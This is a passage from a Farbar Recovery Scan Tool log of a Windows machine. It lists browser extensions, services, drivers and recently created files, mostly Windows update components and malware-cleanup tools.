FF HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Firefox\Extensions: [{8D150B8F-EFE8-45a3-A4A3-053020F48FAC}] - C:\Program Files (x86)\Wondershare\VideoConverterFree\SVRFirefoxExt

Chrome:
=======
CHR Profile: C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-07-07]
CHR Extension: (Google Drive) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-07-07]
CHR Extension: (YouTube) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-07-07]
CHR Extension: (Google Search) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-07-07]
CHR Extension: (Website Logon) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\kanflfepiobnpjbljmngfgegijhdpljm [2014-07-07]
CHR Extension: (Google Wallet) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-07-07]
CHR Extension: (Gmail) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-07-07]
CHR HKLM\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\Exts\Chrome.crx [2015-12-24]
CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\Exts\Chrome.crx [2015-12-24]
CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [kanflfepiobnpjbljmngfgegijhdpljm] - C:\Program Files (x86)\HP SimplePass\tschrome.crx [2013-04-01]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S2 EgisTec Service; C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\EgisService.exe [689008 2010-03-25] (Egis Technology Inc. )
R2 Fitbit Connect; C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe [5738528 2014-11-07] (Fitbit, Inc.) [File not signed]
R2 FPLService; C:\Program Files (x86)\HP SimplePass\TrueSuiteService.exe [1641768 2013-06-07] (HP)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe [46904 2013-12-17] (Hewlett-Packard Company)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [330136 2015-10-30] (Intel Corporation)
R2 IJPLMSVC; C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE [140456 2012-03-27] ()
R2 Intel® ME Service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe [128896 2012-07-17] (Intel Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation)
R2 NS; C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\NS.exe [282016 2015-11-20] (Symantec Corporation)
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [246472 2015-07-17] (Synaptics Incorporated)
S3 TrueService; C:\Program Files\Common Files\AuthenTec\TrueService.exe [401856 2013-01-07] (AuthenTec, Inc.)
R2 valWBFPolicyService; C:\Windows\system32\valWBFPolicyService.exe [28160 2012-09-06] () [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation)
S2 EraserSvc11511; "C:\Program Files (x86)\Norton Security\Engine\22.5.4.24\NS.exe" /h ccCommon [X]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 BHDrvx64; C:\Program Files (x86)\Norton Security\NortonData\22.5.4.24\Definitions\BASHDefs\20160213.003\BHDrvx64.sys [1665608 2015-10-08] (Symantec Corporation)
R1 bsdriver; C:\WINDOWS\system32\drivers\bsdriver.sys [34712 2015-12-18] ()
R1 ccSet_NS; C:\Windows\system32\drivers\NSx64\1605050.00F\ccSetx64.sys [173808 2015-09-23] (Symantec Corporation)
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [92536 2012-06-25] (CyberLink)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [498512 2015-12-23] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [157520 2015-12-23] (Symantec Corporation)
R1 IDSVia64; C:\Program Files (x86)\Norton Security\NortonData\22.5.4.24\Definitions\IPSDefs\20160308.002\IDSvia64.sys [767224 2016-02-15] (Symantec Corporation)
R3 NAVENG; C:\Program Files (x86)\Norton Security\NortonData\22.5.4.24\Definitions\VirusDefs\20160309.020\ENG64.SYS [138488 2015-12-23] (Symantec Corporation)
R3 NAVEX15; C:\Program Files (x86)\Norton Security\NortonData\22.5.4.24\Definitions\VirusDefs\20160309.020\EX64.SYS [2148080 2015-12-23] (Symantec Corporation)
R3 netr28x; C:\Windows\system32\DRIVERS\netr28x.sys [2554528 2015-06-12] (MediaTek Inc.)
S3 RSP2STOR; C:\Windows\system32\DRIVERS\RtsP2Stor.sys [310528 2015-06-05] (Realtek Semiconductor Corp.)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [589824 2015-10-30] (Realtek )
S3 SmbDrv; C:\Windows\System32\drivers\Smb_driver_AMDASF.sys [41272 2012-08-24] (Synaptics Incorporated)
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [42696 2015-07-17] (Synaptics Incorporated)
R1 SRTSP; C:\Windows\System32\Drivers\NSx64\1605050.00F\SRTSP64.SYS [928496 2015-11-11] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\NSx64\1605050.00F\SRTSPX64.SYS [50936 2015-09-23] (Symantec Corporation)
R0 SymEFASI; C:\Windows\System32\drivers\NSx64\1605050.00F\SYMEFASI64.SYS [1621232 2015-11-11] (Symantec Corporation)
S4 SymELAM; C:\Windows\system32\drivers\NSx64\1605050.00F\SymELAM.sys [24192 2015-09-23] (Symantec Corporation)
R3 SymEvent; C:\WINDOWS\system32\Drivers\SYMEVENT64x86.SYS [111344 2015-12-24] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\NSx64\1605050.00F\Ironx64.SYS [297720 2015-09-23] (Symantec Corporation)
R1 SymNetS; C:\Windows\System32\Drivers\NSx64\1605050.00F\SYMNETS.SYS [577768 2015-11-11] (Symantec Corporation)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)
R3 WirelessButtonDriver; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [20800 2013-02-08] (Hewlett-Packard Development Company, L.P.)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-03-09 17:52 - 2016-03-09 17:52 - 00024142 _____ C:\Users\levilaing\Desktop\FRST.txt
2016-03-09 17:47 - 2016-03-09 17:47 - 00002268 _____ C:\Users\levilaing\Desktop\JRT.txt
2016-03-09 17:42 - 2016-03-09 17:42 - 01609216 _____ (Malwarebytes) C:\Users\levilaing\Downloads\JRT.exe
2016-03-09 17:27 - 2016-03-09 17:33 - 00000000 ____D C:\Program Files (x86)\AdwCleaner
2016-03-09 17:26 - 2016-03-09 17:26 - 01524224 _____ C:\Users\levilaing\Downloads\adwcleaner_5.101.exe
2016-03-09 16:45 - 2016-03-09 16:45 - 00019460 _____ C:\Users\levilaing\Desktop\Fixlog.txt
2016-03-08 17:33 - 2016-03-08 17:34 - 00072040 _____ C:\Users\levilaing\Downloads\FRST.txt
2016-03-08 17:33 - 2016-03-08 17:33 - 02374144 _____ (Farbar) C:\Users\levilaing\Desktop\FRST64.exe
2016-03-08 17:29 - 2016-03-08 17:32 - 00000253 _____ C:\Users\levilaing\Downloads\Search.txt
2016-03-08 17:16 - 2016-03-09 17:52 - 00000000 ____D C:\FRST
2016-03-08 16:37 - 2016-03-08 16:38 - 00041639 _____ C:\Users\levilaing\Downloads\Addition.txt
2016-03-01 13:31 - 2016-03-01 13:31 - 00000860 _____ C:\WINDOWS\system32\Drivers\etc\hosts.bak
2016-03-01 13:26 - 2016-03-01 13:50 - 00000000 ____D C:\Users\levilaing\AppData\Local\NPE
2016-03-01 12:58 - 2016-02-23 05:27 - 02654872 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2016-03-01 12:58 - 2016-02-23 05:23 - 00713568 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-03-01 12:58 - 2016-02-23 05:22 - 01173344 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-03-01 12:58 - 2016-02-23 05:15 - 00513888 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-03-01 12:58 - 2016-02-23 04:32 - 08705672 _____ (Microsoft Corp.) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2016-03-01 12:58 - 2016-02-23 04:31 - 00408120 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
2016-03-01 12:58 - 2016-02-23 04:21 - 22564328 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-03-01 12:58 - 2016-02-23 04:21 - 06606568 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2016-03-01 12:58 - 2016-02-23 03:45 - 02773096 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d11.dll
2016-03-01 12:58 - 2016-02-23 03:45 - 01998176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2016-03-01 12:58 - 2016-02-23 03:45 - 00576352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2016-03-01 12:58 - 2016-02-23 03:38 - 06952088 _____ (Microsoft Corp.) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2016-03-01 12:58 - 2016-02-23 03:27 - 21124344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-03-01 12:58 - 2016-02-23 03:26 - 05241984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2016-03-01 12:58 - 2016-02-23 02:58 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll
2016-03-01 12:58 - 2016-02-23 02:29 - 00591872 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmsRouterSvc.dll
2016-03-01 12:58 - 2016-02-23 02:28 - 00275456 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2016-03-01 12:58 - 2016-02-23 02:09 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2016-03-01 12:58 - 2016-02-23 02:00 - 02624512 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2016-03-01 12:58 - 2016-02-23 01:58 - 00345600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TextInputFramework.dll
2016-03-01 12:58 - 2016-02-23 01:30 - 01731584 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-03-01 12:58 - 2016-02-23 01:24 - 02755584 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-03-01 12:58 - 2016-02-23 00:52 - 11545600 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-03-01 12:58 - 2016-02-23 00:50 - 22396416 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-03-01 12:58 - 2016-02-23 00:50 - 09919488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-03-01 12:58 - 2016-02-23 00:40 - 24603136 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-03-01 12:58 - 2016-02-23 00:39 - 13382656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-03-01 12:58 - 2016-02-23 00:39 - 02581504 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2016-03-01 12:58 - 2016-02-23 00:36 - 19341312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-03-01 12:58 - 2016-02-23 00:36 - 18680320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-03-01 12:58 - 2016-02-23 00:36 - 12125696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-03-01 12:58 - 2016-02-23 00:33 - 14254080 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll
2016-03-01 12:58 - 2016-02-08 21:24 - 00641536 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2016-03-01 12:58 - 2016-02-08 21:04 - 01946624 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2016-03-01 12:57 - 2016-02-23 05:29 - 01030416 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2016-03-01 12:57 - 2016-02-23 05:29 - 00874968 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-03-01 12:57 - 2016-02-23 05:27 - 07475040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-03-01 12:57 - 2016-02-23 05:27 - 01317640 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-03-01 12:57 - 2016-02-23 05:27 - 01141504 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-03-01 12:57 - 2016-02-23 05:25 - 02152288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2016-03-01 12:57 - 2016-02-23 05:25 - 01818696 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-03-01 12:57 - 2016-02-23 05:25 - 00563552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\acpi.sys
2016-03-01 12:57 - 2016-02-23 05:15 - 00779384 _____ (Microsoft Corporation) C:\WINDOWS\system32\taskschd.dll
2016-03-01 12:57 - 2016-02-23 05:09 - 01614176 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2016-03-01 12:57 - 2016-02-23 05:08 - 00989536 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2016-03-01 12:57 - 2016-02-23 04:34 - 01859960 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2016-03-01 12:57 - 2016-02-23 04:34 - 01542816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-03-01 12:57 - 2016-02-23 04:33 - 00696160 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupEngine.dll
2016-03-01 12:57 - 2016-02-23 04:33 - 00389992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanapi.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 02544264 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 01152328 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfasfsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 01062480 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 00498448 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFCaptureEngine.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 00369912 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2016-03-01 12:57 - 2016-02-23 04:31 - 01017032 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 04:31 - 00847656 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2016-03-01 12:57 - 2016-02-23 04:31 - 00819648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
2016-03-01 12:57 - 2016-02-23 04:31 - 00536256 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2016-03-01 12:57 - 2016-02-23 04:31 - 00476728 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvproc.dll
2016-03-01 12:57 - 2016-02-23 04:25 - 03671888 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-03-01 12:57 - 2016-02-23 04:22 - 00572272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\taskschd.dll
2016-03-01 12:57 - 2016-02-23 04:17 - 00146272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\appid.sys
2016-03-01 12:57 - 2016-02-23 03:49 - 00216416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2016-03-01 12:57 - 2016-02-23 03:45 - 00394080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2016-03-01 12:57 - 2016-02-23 03:45 - 00259336 _____ (Microsoft Corporation) C:\WINDOWS\system32\sqmapi.dll
2016-03-01 12:57 - 2016-02-23 03:44 - 00640984 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2016-03-01 12:57 - 2016-02-23 03:44 - 00147808 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2016-03-01 12:57 - 2016-02-23 03:40 - 00430944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2016-03-01 12:57 - 2016-02-23 03:39 - 00502112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupEngine.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 02180136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00980352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfasfsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00895080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00882720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00709176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00450912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFCaptureEngine.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00420928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvproc.dll
2016-03-01 12:57 - 2016-02-23 03:37 - 00713824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
2016-03-01 12:57 - 2016-02-23 03:32 - 00791744 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2016-03-01 12:57 - 2016-02-23 03:30 - 02919320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-03-01 12:57 - 2016-02-23 03:27 - 00376536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.MediaControl.dll
2016-03-01 12:57 - 2016-02-23 03:25 - 00534368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2016-03-01 12:57 - 2016-02-23 03:20 - 01139712 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblGameSave.dll
2016-03-01 12:57 - 2016-02-23 03:20 - 00238592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xboxgip.sys
2016-03-01 12:57 - 2016-02-23 03:19 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xinputhid.sys
2016-03-01 12:57 - 2016-02-23 03:17 - 00649216 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll
2016-03-01 12:57 - 2016-02-23 03:12 - 00077824 _____ (Microsoft Corporation) C:\WINDOWS\system32\provpackageapidll.dll
2016-03-01 12:57 - 2016-02-23 03:10 - 00027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiConfigSP.dll
2016-03-01 12:57 - 2016-02-23 03:07 - 00037376 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
2016-03-01 12:57 - 2016-02-23 03:07 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvcpal.dll
2016-03-01 12:57 - 2016-02-23 03:06 - 00129536 _____ (Microsoft Corporation) C:\WINDOWS\system32\flvprophandler.dll
2016-03-01 12:57 - 2016-02-23 03:01 - 00104960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rasl2tp.sys
2016-03-01 12:57 - 2016-02-23 03:00 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseDesktopAppMgmtCSP.dll
2016-03-01 12:57 - 2016-02-23 03:00 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfdprov.dll
2016-03-01 12:57 - 2016-02-23 02:58 - 00187744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2016-03-01 12:57 - 2016-02-23 02:58 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininetlui.dll
2016-03-01 12:57 - 2016-02-23 02:58 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\irmon.dll
2016-03-01 12:57 - 2016-02-23 02:57 - 00199168 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2016-03-01 12:57 - 2016-02-23 02:56 - 02186864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d11.dll
2016-03-01 12:57 - 2016-02-23 02:55 - 00221600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sqmapi.dll
2016-03-01 12:57 - 2016-02-23 02:55 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bridge.sys
2016-03-01 12:57 - 2016-02-23 02:54 - 00539256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2016-03-01 12:57 - 2016-02-23 02:54 - 00141664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe
2016-03-01 12:57 - 2016-02-23 02:53 - 00115712 _____ (Microsoft Corporation) C:\WINDOWS\system32\srpapi.dll
2016-03-01 12:57 - 2016-02-23 02:53 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngckeyenum.dll
2016-03-01 12:57 - 2016-02-23 02:52 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDMAppInstaller.exe
2016-03-01 12:57 - 2016-02-23 02:50 - 00159232 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2016-03-01 12:57 - 2016-02-23 02:48 - 00086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppCapture.dll
2016-03-01 12:57 - 2016-02-23 02:48 - 00041984 _____ (Microsoft Corporation) C:\WINDOWS\system32\TimeBrokerClient.dll
2016-03-01 12:57 - 2016-02-23 02:40 - 00074240 _____ (Microsoft Corporation) C:\WINDOWS\system32\SMSRouter.dll
2016-03-01 12:57 - 2016-02-23 02:39 - 00178176 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll
2016-03-01 12:57 - 2016-02-23 02:38 - 00320000 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSFlacDecoder.dll
2016-03-01 12:57 - 2016-02-23 02:38 - 00287712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.MediaControl.dll
2016-03-01 12:57 - 2016-02-23 02:37 - 00617984 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2016-03-01 12:57 - 2016-02-23 02:37 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\DisplayManager.dll
2016-03-01 12:57 - 2016-02-23 02:37 - 00204288 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupSvc.dll
2016-03-01 12:57 - 2016-02-23 02:36 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\QuickActionsDataModel.dll
2016-03-01 12:57 - 2016-02-23 02:34 - 00305664 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifiprofilessettinghandler.dll
2016-03-01 12:57 - 2016-02-23 02:34 - 00189952 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll
2016-03-01 12:57 - 2016-02-23 02:33 - 00558080 _____ (Microsoft Corporation) C:\WINDOWS\system32\MBMediaManager.dll
2016-03-01 12:57 - 2016-02-23 02:32 - 00414720 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe
2016-03-01 12:57 - 2016-02-23 02:31 - 00463360 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansec.dll
2016-03-01 12:57 - 2016-02-23 02:30 - 00360448 _____ (Microsoft Corporation) C:\WINDOWS\system32\vaultsvc.dll
2016-03-01 12:57 - 2016-02-23 02:28 - 00685568 _____ (Microsoft Corporation) C:\WINDOWS\system32\scapi.dll
2016-03-01 12:57 - 2016-02-23 02:27 - 00307712 _____ (Microsoft Corporation) C:\WINDOWS\system32\usbmon.dll
2016-03-01 12:57 - 2016-02-23 02:26 - 00372224 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDEServer.exe
2016-03-01 12:57 - 2016-02-23 02:25 - 00288768 _____ (Microsoft Corporation) C:\WINDOWS\system32\vaultcli.dll
2016-03-01 12:57 - 2016-02-23 02:25 - 00229376 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsqmcons.exe
2016-03-01 12:57 - 2016-02-23 02:23 - 00412672 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanmsm.dll
2016-03-01 12:57 - 2016-02-23 02:22 - 00567808 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll
2016-03-01 12:57 - 2016-02-23 02:22 - 00451584 _____ (Microsoft Corporation) C:\WINDOWS\system32\werui.dll
2016-03-01 12:57 - 2016-02-23 02:20 - 00847360 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll
2016-03-01 12:57 - 2016-02-23 02:20 - 00606720 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll
2016-03-01 12:57 - 2016-02-23 02:20 - 00493568 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmkvsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 02:20 - 00330240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2016-03-01 12:57 - 2016-02-23 02:19 - 00948736 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManager.dll
2016-03-01 12:57 - 2016-02-23 02:19 - 00517632 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2016-03-01 12:57 - 2016-02-23 02:18 - 00557056 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll
2016-03-01 12:57 - 2016-02-23 02:14 - 00828928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.AccountsControl.dll
2016-03-01 12:57 - 2016-02-23 02:14 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LaunchWinApp.exe
2016-03-01 12:57 - 2016-02-23 02:13 - 00915456 _____ (Microsoft Corporation) C:\WINDOWS\system32\configurationclient.dll
2016-03-01 12:57 - 2016-02-23 02:13 - 00286720 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceaccess.dll
2016-03-01 12:57 - 2016-02-23 02:12 - 00852480 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2016-03-01 12:57 - 2016-02-23 02:11 - 01224704 _____ (Microsoft Corporation) C:\WINDOWS\system32\Unistore.dll
2016-03-01 12:57 - 2016-02-23 02:11 - 00587776 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2016-03-01 12:57 - 2016-02-23 02:10 - 00997376 _____ (Microsoft Corporation) C:\WINDOWS\system32\schedsvc.dll
2016-03-01 12:57 - 2016-02-23 02:10 - 00474624 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupShim.dll
2016-03-01 12:57 - 2016-02-23 02:09 - 01390592 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-03-01 12:57 - 2016-02-23 02:09 - 00988160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
